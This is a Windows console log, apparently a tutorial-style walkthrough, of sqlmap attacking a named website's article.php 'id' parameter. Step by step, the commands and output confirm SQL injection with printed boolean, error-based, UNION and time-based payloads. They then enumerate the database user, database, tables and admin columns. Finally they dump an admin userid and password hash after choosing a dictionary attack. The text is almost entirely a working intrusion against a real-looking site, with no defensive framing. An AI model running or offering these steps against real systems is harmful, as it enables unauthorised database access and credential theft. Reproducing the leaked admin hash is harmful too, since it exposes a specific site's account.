D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>